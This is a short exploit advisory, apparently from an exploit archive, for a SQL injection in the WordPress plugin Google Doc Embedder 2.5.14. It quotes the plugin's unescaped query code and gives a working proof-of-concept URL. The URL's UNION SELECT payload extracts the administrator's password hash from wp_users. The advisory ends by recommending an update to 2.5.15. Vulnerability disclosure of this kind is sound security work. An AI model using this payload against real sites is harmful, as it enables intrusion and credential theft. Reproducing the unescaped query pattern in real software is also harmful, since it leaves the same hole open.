Wordpress Google Document Embedder 2.5.14 - SQL Injection

2014-11-25 18:05:04

# Exploit Title: Google Doc Embedder 2.5.14 SQL Injection
# Date: 10-11-2014
# Exploit Author: Kacper Szurek - http://security.szurek.pl http://twitter.com/KacperSzurek
# Software Link: https://downloads.wordpress.org/plugin/google-document-embedder.2.5.14.zip
# Category: webapps

1. Description

$_GET['gpid'] is not escaped.

File: google-document-embedder\view.php
if ( isset( $_GET['gpid'] ) ) {
if ( $profile = gde_get_profile( $_GET['gpid'] ) ) {
$tb = $profile['tb_flags'];
$vw = $profile['vw_flags'];
$bg = $profile['vw_bgcolor'];
$css = $profile['vw_css'];

So we control $id.

File: google-document-embedder\view.php
function gde_get_profile( $id ) {
global $wpdb;
$table = $wpdb->prefix . 'gde_profiles';

$profile = $wpdb->get_results( "SELECT * FROM $table WHERE profile_id = $id", ARRAY_A );
$profile = unserialize($profile[0]['profile_data']);

if ( is_array($profile) ) {
return $profile;
} else {
return false;


2. Proof of Concept

http://wordpress-install/wp-content/plugins/google-document-embedder/view.php?embedded=1&gpid=0 UNION SELECT 1, 2, 3, CONCAT(CAST(CHAR(97, 58, 49, 58, 123, 115, 58, 54, 58, 34, 118, 119, 95, 99, 115, 115, 34, 59, 115, 58) as CHAR), LENGTH(user_pass), CAST(CHAR(58, 34) as CHAR), user_pass, CAST(CHAR(34, 59, 125) as CHAR)) FROM `wp_users` WHERE ID=1

3. Solution:

Update to version 2.5.15


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